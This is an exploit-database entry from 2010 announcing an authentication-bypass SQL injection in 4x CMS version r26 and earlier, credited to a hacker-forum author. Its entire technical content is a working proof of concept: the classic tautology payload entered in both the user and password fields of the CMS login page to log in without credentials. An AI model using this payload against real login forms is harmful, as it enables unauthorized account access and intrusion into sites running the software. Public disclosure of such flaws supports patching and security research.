4x CMS r26 - Authentication Bypass

EDB-ID:

11833

CVE:

N/A

Author:

cr4wl3r

Type:

webapps

Platform:

PHP

Published:

2010-03-21

=======================================================
4x cms <= r26 (Auth Bypass) SQL Injection Vulnerability
=======================================================


[+] 4xcms <= r26 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original: http://inj3ct0r.com/exploits/11392
[+] Download : http://code.google.com/p/4xcms/downloads/list

[+] PoC: [path]/login.php
    User : ' or '1=1
    Pass : ' or '1=1

[+] Greetz: All member inj3ct0r.com


# Inj3ct0r.com [2010-03-22]